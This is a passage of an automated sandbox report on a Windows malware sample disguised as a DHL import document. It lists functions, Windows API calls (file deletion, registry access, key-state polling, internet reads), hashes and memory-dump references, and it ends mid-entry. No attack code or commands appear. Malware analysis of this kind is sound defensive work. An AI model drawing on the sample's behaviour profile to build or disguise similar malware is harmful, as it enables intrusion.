                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                          • API String ID: 145871493-2590602151
                                                                                          • Opcode ID: 56acc7635ec59a8e162ee66810f510506ebedb2c72ae03935ba7bb40182e2d97
                                                                                          • Instruction ID: ee55df78d4b2c9c4a4cd8b794dae97da1a7f13b66ca70176b47b07baf1497b6c
                                                                                          • Opcode Fuzzy Hash: 56acc7635ec59a8e162ee66810f510506ebedb2c72ae03935ba7bb40182e2d97
                                                                                          • Instruction Fuzzy Hash: 78F05C31406770DBDB7267109C0C97A3F10FF12701F6A8056F842E6201E764CCC486C1
                                                                                          Function 007D4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E9C
                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4EAE
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EC0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                          • API String ID: 145871493-3689287502
                                                                                          • Opcode ID: 5ae4dd9c37ccc0a770bab64cd97c8e4560bad834c27b165545f25ce5cba3b315
                                                                                          • Instruction ID: 9de458723e45d0029d1a1cb5d66f2cb942ee730e5f33f2b0475bffe02b9a5a06
                                                                                          • Opcode Fuzzy Hash: 5ae4dd9c37ccc0a770bab64cd97c8e4560bad834c27b165545f25ce5cba3b315
                                                                                          • Instruction Fuzzy Hash: 58E0E635A015226B92711B25AC19A7B7664BF86B6270A0116FD45D2351DBB8CD0145A1
                                                                                          Function 007D4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E62
                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4E74
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E87
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                          • API String ID: 145871493-1355242751
                                                                                          • Opcode ID: f24b0283ae896b0715653a2d9263679abb4e88d818bf0dcff4638537704c6980
                                                                                          • Instruction ID: 218106695dc267e442a51e82e977eea59d0e543f15694cee98d9b87d3399f11f
                                                                                          • Opcode Fuzzy Hash: f24b0283ae896b0715653a2d9263679abb4e88d818bf0dcff4638537704c6980
                                                                                          • Instruction Fuzzy Hash: 1DD012355026A1675A222B25FC18DAB7B28FFC6B613070616F945E2314CFB8CD0185D0
                                                                                          Function 00842947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842C05
                                                                                          • DeleteFileW.KERNEL32(?), ref: 00842C87
                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00842C9D
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842CAE
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842CC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Delete$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3226157194-0
                                                                                          • Opcode ID: 15ecb7e40edec9994eb36f5d092576490914e6f6c68fc1395850ff6bea0526c5
                                                                                          • Instruction ID: 6b68b08c36382d805d57ab32d268f3660f3197392dfff93e2b1ec02d5eaf581e
                                                                                          • Opcode Fuzzy Hash: 15ecb7e40edec9994eb36f5d092576490914e6f6c68fc1395850ff6bea0526c5
                                                                                          • Instruction Fuzzy Hash: 66B15D7190411DABDF21EBA4CC89EEEBB7DFF48354F5040A6F609E6241EA349A448F61
                                                                                          Function 0085A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0085A427
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0085A435
                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0085A468
                                                                                          • CloseHandle.KERNEL32(?), ref: 0085A63D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3488606520-0
                                                                                          • Opcode ID: 6a12f2e3939daa1bece2c971b0c8c6446c1f38efd1130e6768567293fcb7ee7c
                                                                                          • Instruction ID: 7ace27999102b3f016e783dc78ca0cadcc6a011880f4eb4bc54a39b77452d812
                                                                                          • Opcode Fuzzy Hash: 6a12f2e3939daa1bece2c971b0c8c6446c1f38efd1130e6768567293fcb7ee7c
                                                                                          • Instruction Fuzzy Hash: C3A18A716043019FD724DF24C886B2AB7E1EB88714F14891DF99ADB392D7B4EC448B92
                                                                                          Function 0083E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0083CF22,?), ref: 0083DDFD
                                                                                            • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0083CF22,?), ref: 0083DE16
                                                                                            • Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0083E473
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0083E4AC
                                                                                          • _wcslen.LIBCMT ref: 0083E5EB
                                                                                          • _wcslen.LIBCMT ref: 0083E603
                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0083E650
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 3183298772-0
                                                                                          • Opcode ID: 2df7d70c77f266c0b944744b8b0f3add927cebb98212e7c59c677b67875f10f0
                                                                                          • Instruction ID: 9919815346d7804bce73bbb215cb336cb2bad4b94f7453523ea2811b220d5172
                                                                                          • Opcode Fuzzy Hash: 2df7d70c77f266c0b944744b8b0f3add927cebb98212e7c59c677b67875f10f0
                                                                                          • Instruction Fuzzy Hash: 295183B24087459BC724DB94D8859EFB7ECEFC4340F00491EF689D3191EF74A58887AA
                                                                                          Function 0085B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085BAA5
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085BB00
                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0085BB63
                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0085BBA6
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0085BBB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                          • String ID:
                                                                                          • API String ID: 826366716-0
                                                                                          • Opcode ID: ee82b86ff0134741ca29081721a54f16355c7cdfb14977ec307f01215a53ec92
                                                                                          • Instruction ID: 2ccaa2c44486ecd5bbb3a8be1ddc9c82817d699e0538601333b71591ffb3a0ea
                                                                                          • Opcode Fuzzy Hash: ee82b86ff0134741ca29081721a54f16355c7cdfb14977ec307f01215a53ec92
                                                                                          • Instruction Fuzzy Hash: 07618C31208241EFD714DF24C494E2ABBE5FF84318F54855DF8998B2A2DB35ED49CB92
                                                                                          Function 00838BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 00838BCD
                                                                                          • VariantClear.OLEAUT32 ref: 00838C3E
                                                                                          • VariantClear.OLEAUT32 ref: 00838C9D
                                                                                          • VariantClear.OLEAUT32(?), ref: 00838D10
                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00838D3B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                          • String ID:
                                                                                          • API String ID: 4136290138-0
                                                                                          • Opcode ID: 24a20db3196513e65e624e27818af10a205cdd3a5eaafd089d00d40b4b01a326
                                                                                          • Instruction ID: 425b2f9e228a96fd76c375573769bb383a0268bc20cbfe24ec16f9c04b06aafa
                                                                                          • Opcode Fuzzy Hash: 24a20db3196513e65e624e27818af10a205cdd3a5eaafd089d00d40b4b01a326
                                                                                          • Instruction Fuzzy Hash: A65147B5A00219EFCB14CF68C894AAAB7F8FF89314F158559F905DB350EB34E911CBA0
                                                                                          Function 00848AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00848BAE
                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00848BDA
                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00848C32
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00848C57
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00848C5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                          • String ID:
                                                                                          • API String ID: 2832842796-0
                                                                                          • Opcode ID: 1a88cf4231ee8dfc800bd927af0cba72d6f9fc5f3299f619e323c6e4edb719e4
                                                                                          • Instruction ID: 61d0de38ce467a8ef396912553555582b261f7228826ca20ca343d0f95ceadc6
                                                                                          • Opcode Fuzzy Hash: 1a88cf4231ee8dfc800bd927af0cba72d6f9fc5f3299f619e323c6e4edb719e4
                                                                                          • Instruction Fuzzy Hash: AB515A35A00219DFCB05DF65C884A6DBBF5FF48314F088059E84AAB362DB35ED51CBA1
                                                                                          Function 00858EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00858F40
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00858FD0
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00858FEC
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00859032
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00859052
                                                                                            • Part of subcall function 007EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00841043,?,753CE610), ref: 007EF6E6
                                                                                            • Part of subcall function 007EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0082FA64,00000000,00000000,?,?,00841043,?,753CE610,?,0082FA64), ref: 007EF70D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                          • String ID:
                                                                                          • API String ID: 666041331-0
                                                                                          • Opcode ID: 6ec6981ea4483b56632af7e22a6259553a7b30d861e01afa1bda0fc4af9ea462
                                                                                          • Instruction ID: 4e82d08cedc897426bc670ce55165b9d7162791eebff91b28ac4d84a410812c9
                                                                                          • Opcode Fuzzy Hash: 6ec6981ea4483b56632af7e22a6259553a7b30d861e01afa1bda0fc4af9ea462
                                                                                          • Instruction Fuzzy Hash: EA512935600245DFC715DF58C4948ADBBF1FF49315B0980AAEC4AAB362DB35ED89CB90
                                                                                          Function 00866B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00866C33
                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00866C4A
                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00866C73
                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0084AB79,00000000,00000000), ref: 00866C98
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00866CC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                          • String ID:
                                                                                          • API String ID: 3688381893-0
                                                                                          • Opcode ID: e8da5136f5decd2a93564dc31c7f1bd4a12149bffbe012b7fc9269a0e1be9136
                                                                                          • Instruction ID: b8b08d24a00213aeca5af239b4339d649611bca8924755320d388e7795f42e5e
                                                                                          • Opcode Fuzzy Hash: e8da5136f5decd2a93564dc31c7f1bd4a12149bffbe012b7fc9269a0e1be9136
                                                                                          • Instruction Fuzzy Hash: C841D635A04584AFDB24CF28CC59FB57FA5FB09364F160228F895E72E0E371AD61CA40
                                                                                          Function 00802051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: e9bdddf38ad54571e5b2218e53834f071da863af7b08141b1a097220df84aff7
                                                                                          • Instruction ID: 26deb6b3402912def2d0ba03a5a17e54c6465d59b4ee11bc33a14275666d7848
                                                                                          • Opcode Fuzzy Hash: e9bdddf38ad54571e5b2218e53834f071da863af7b08141b1a097220df84aff7
                                                                                          • Instruction Fuzzy Hash: 0F41E132A00604DFCB20DF78CC88A5EB7B5FF89314F1545A9E615EB392DA71AD01CB81
                                                                                          Function 007E912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 007E9141
                                                                                          • ScreenToClient.USER32(00000000,?), ref: 007E915E
                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 007E9183
                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 007E919D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                          • String ID:
                                                                                          • API String ID: 4210589936-0
                                                                                          • Opcode ID: 8c2c8a9d7e896fa3e91d1aa0ccb6d0cdf436cbfb77869c82b05265fa9de129ab
                                                                                          • Instruction ID: 5c77d0dc55b3abd452984299c820b7d5fadd9084ce1bf90980e77aa802a823ee
                                                                                          • Opcode Fuzzy Hash: 8c2c8a9d7e896fa3e91d1aa0ccb6d0cdf436cbfb77869c82b05265fa9de129ab
                                                                                          • Instruction Fuzzy Hash: 7741613190855AFBDF159F69D848BEEB774FF09324F204219E529A32D0C7745D90CB51
                                                                                          Function 00843874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetInputState.USER32 ref: 008438CB
                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00843922
                                                                                          • TranslateMessage.USER32(?), ref: 0084394B
                                                                                          • DispatchMessageW.USER32(?), ref: 00843955
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00843966
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                          • String ID:
                                                                                          • API String ID: 2256411358-0
                                                                                          • Opcode ID: 81681e0811f55dee0a1fb6e5ecc518ee3e040ad39f33e2f577e67d5ecf76fe92
                                                                                          • Instruction ID: d8aed37640d53bfe4ae4bd9a38933d9dd1894a7926a01ea8d4e2f4232ec67475
                                                                                          • Opcode Fuzzy Hash: 81681e0811f55dee0a1fb6e5ecc518ee3e040ad39f33e2f577e67d5ecf76fe92
                                                                                          • Instruction Fuzzy Hash: 6131A27090434A9EFF35CB75984CBB6BFA8FB17304F040569E4A2C29A0E7F49A85CB11
                                                                                          Function 0084CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CF38
                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0084CF6F
                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFB4
                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFC8
                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFF2
                                                                                          Memory Dump Source
